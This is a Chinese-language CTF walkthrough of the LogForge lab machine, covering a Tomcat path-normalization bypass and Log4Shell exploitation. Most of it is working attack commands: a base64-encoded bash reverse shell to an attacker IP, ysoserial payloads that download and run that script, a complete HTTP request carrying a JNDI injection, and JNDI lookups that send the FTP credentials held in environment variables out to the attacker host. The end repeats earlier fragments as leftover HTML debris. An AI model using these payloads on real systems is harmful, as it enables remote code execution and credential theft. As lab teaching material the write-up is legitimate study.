LogForge 渗透测试教学文档：PNA+Log4j+环境变量泄露漏洞利用<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>

IP地址: 10.10.11.138<\/code><\/li>

开放端口:

TCP 22: OpenSSH 8.2p1 (Ubuntu Linux)<\/li>
TCP 80: Apache httpd 2.4.41 (Ubuntu)<\/li>
<\/ul>
<\/li>
<\/ul>
1.2 扫描技术<\/h3>
使用以下命令进行高效扫描：<\/p>
ip=<\/span>'10.10.11.138'<\/span>; itf=<\/span>'tun0'<\/span>
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span>
<\/span><\/span>  echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>
<\/span><\/span>  ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>  if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>
<\/span><\/span>    nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>
<\/span><\/span>  else<\/span>
<\/span><\/span>    echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>
<\/span><\/span>  fi<\/span>
<\/span><\/span>else<\/span>
<\/span><\/span>  echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>2. 路径规范化攻击(Path Normalization Attack)<\/h2>
2.1 漏洞背景<\/h3>
Apache中间件和Tomcat协调不当会导致解析错误，造成目录穿越漏洞。<\/p>
参考资源:<\/p>

BlackHat演讲<\/a><\/li>
HackerOne报告<\/a><\/li>
<\/ul>
2.2 漏洞验证<\/h3>
尝试访问Tomcat管理器界面：<\/p>
http:\/\/10.10.11.138\/test\/..;\/manager\/
<\/code><\/pre>
发现无法上传war包，受到大小限制。<\/p>
3. Log4j漏洞利用<\/h2>
3.1 漏洞发现<\/h3>
系统使用Log4j进行日志记录，存在Log4Shell漏洞(CVE-2021-44228)。<\/p>
3.2 攻击准备<\/h3>


下载必要工具：<\/p>

ysoserial-all.jar<\/a><\/li>
JNDI-Exploit-Kit<\/a><\/li>
<\/ul>
<\/li>

准备反弹shell脚本：<\/p>
<\/li>
<\/ol>
echo IyEvYmluL2Jhc2gKCmJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMjEvNDQzIDA+JjEK | base64 -d > rev.sh
<\/span><\/span><\/code><\/pre>解码后内容为：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>
<\/span><\/span>bash -i >& \/dev\/tcp\/10.10.16.21\/443 0>&1<\/span>
<\/span><\/span><\/code><\/pre>
启动HTTP服务器：<\/li>
<\/ol>
python3 -m http.server 80<\/span>
<\/span><\/span><\/code><\/pre>3.3 生成恶意序列化对象<\/h3>
java -jar ysoserial-all.jar CommonsCollections5 "wget 10.10.16.21\/rev.sh -O \/tmp\/rev.sh"<\/span> > exp.ser
<\/span><\/span>java -jar ysoserial-all.jar CommonsCollections5 "bash \/tmp\/rev.sh"<\/span> > exp.ser
<\/span><\/span><\/code><\/pre>3.4 启动JNDI服务器<\/h3>
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -L 10.10.16.21:1389 -P exp.ser
<\/span><\/span><\/code><\/pre>3.5 触发漏洞<\/h3>
发送包含恶意JNDI查找的HTTP请求：<\/p>
POST<\/span> \/x\/..;\/manager\/html\/expire?path=\/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 10.10.11.138<\/span>
<\/span><\/span>Content-Length:<\/span> 37<\/span>
<\/span><\/span>Cache-Control:<\/span> max-age=0<\/span>
<\/span><\/span>Authorization:<\/span> Basic dG9tY2F0OnRvbWNhdA==<\/span>
<\/span><\/span>Upgrade-Insecure-Requests:<\/span> 1<\/span>
<\/span><\/span>Origin:<\/span> http:\/\/10.10.11.138<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/124.0.6367.118 Safari\/537.36<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7<\/span>
<\/span><\/span>Referer:<\/span> http:\/\/10.10.11.138\/x\/..;\/manager\/html\/expire<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br<\/span>
<\/span><\/span>Accept-Language:<\/span> en-US,en;q=0.9<\/span>
<\/span><\/span>Cookie:<\/span> JSESSIONID=7677CE99BF79B82026D59355C960A40B<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>
<\/span><\/span>idle=${jndi:ldap:\/\/10.10.16.21\/log4j}
<\/span><\/span><\/code><\/pre>4. 权限提升：环境变量泄露<\/h2>
4.1 发现FTP服务<\/h3>
在目标系统上发现：<\/p>
\/root\/ftpServer-1.0-SNAPSHOT-all.jar
<\/code><\/pre>
4.2 反编译分析<\/h3>
FTP服务从环境变量中获取凭据：<\/p>
private<\/span> String validUser =<\/span> System.<\/span>getenv<\/span>(<\/span>"ftp_user"<\/span>);<\/span>
<\/span><\/span>private<\/span> String validPassword =<\/span> System.<\/span>getenv<\/span>(<\/span>"ftp_password"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>4.3 利用Log4j泄露环境变量<\/h3>

启动JNDI服务器：<\/li>
<\/ol>
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -L 10.10.16.21:1389
<\/span><\/span><\/code><\/pre>
通过FTP服务触发环境变量泄露：<\/li>
<\/ol>
ftp 127.0.0.1
<\/span><\/span>Name (<\/span>127.0.0.1:tomcat)<\/span>: ${<\/span>jndi:ldap:\/\/10.10.16.21\/ftp}<\/span>
<\/span><\/span>Name (<\/span>127.0.0.1:tomcat)<\/span>: ${<\/span>jndi:ldap:\/\/10.10.16.21:1389\/${<\/span>env:ftp_user}}<\/span>
<\/span><\/span>Name (<\/span>127.0.0.1:tomcat)<\/span>: ${<\/span>jndi:ldap:\/\/10.10.16.21:1389\/${<\/span>env:ftp_password}}<\/span>
<\/span><\/span><\/code><\/pre>
获取到的凭据：<\/li>
<\/ol>

用户名: ippsec<\/code><\/li>
密码: log4j_env_leakage<\/code><\/li>
<\/ul>
4.4 获取root权限<\/h3>
使用获取的凭据登录FTP服务，最终获取root权限。<\/p>
5. Flag获取<\/h2>

用户flag: db5c9789a7e1a00a3db893fb771902be<\/code><\/li>
root flag: 9dc56a5de92c2e135b6492f878218754<\/code><\/li>
<\/ul>
6. 关键点总结<\/h2>

路径规范化攻击<\/strong>：利用Apache和Tomcat解析差异实现目录穿越<\/li>
Log4Shell漏洞<\/strong>：通过JNDI注入实现RCE<\/li>
环境变量泄露<\/strong>：利用Log4j的日志记录功能泄露敏感环境变量<\/li>
权限提升链<\/strong>：从Tomcat用户到root的完整提权路径<\/li>
<\/ol>
7. 防御建议<\/h2>

及时更新Log4j到安全版本<\/li>
避免在环境变量中存储敏感信息<\/li>
配置Tomcat和Apache的路径解析规则保持一致<\/li>
实施最小权限原则，限制服务账户权限<\/li>
<\/ol>

LogForge 渗透测试教学文档：PNA+Log4j+环境变量泄露漏洞利用<\/h1>

1. 信息收集阶段<\/h2>

2. 路径规范化攻击(Path Normalization Attack)<\/h2>

2.1 漏洞背景<\/h3> Apache中间件和Tomcat协调不当会导致解析错误，造成目录穿越漏洞。<\/p> 参考资源:<\/p> BlackHat演讲<\/a><\/li> HackerOne报告<\/a><\/li> <\/ul> 2.2 漏洞验证<\/h3> 尝试访问Tomcat管理器界面：<\/p>

2.2 漏洞验证<\/h3> 尝试访问Tomcat管理器界面：<\/p>

3. Log4j漏洞利用<\/h2>

3.1 漏洞发现<\/h3> 系统使用Log4j进行日志记录，存在Log4Shell漏洞(CVE-2021-44228)。<\/p>

3.2 攻击准备<\/h3> 下载必要工具：<\/p>

4. 权限提升：环境变量泄露<\/h2>

4.4 获取root权限<\/h3> 使用获取的凭据登录FTP服务，最终获取root权限。<\/p>

7. 防御建议<\/h2> 及时更新Log4j到安全版本<\/li> 避免在环境变量中存储敏感信息<\/li> 配置Tomcat和Apache的路径解析规则保持一致<\/li> 实施最小权限原则，限制服务账户权限<\/li> <\/ol>

3.1 漏洞发现<\/h3>
系统使用Log4j进行日志记录，存在Log4Shell漏洞(CVE-2021-44228)。<\/p>

4.4 获取root权限<\/h3>
使用获取的凭据登录FTP服务，最终获取root权限。<\/p>

7. 防御建议<\/h2>

及时更新Log4j到安全版本<\/li>
避免在环境变量中存储敏感信息<\/li>
配置Tomcat和Apache的路径解析规则保持一致<\/li>
实施最小权限原则，限制服务账户权限<\/li> <\/ol>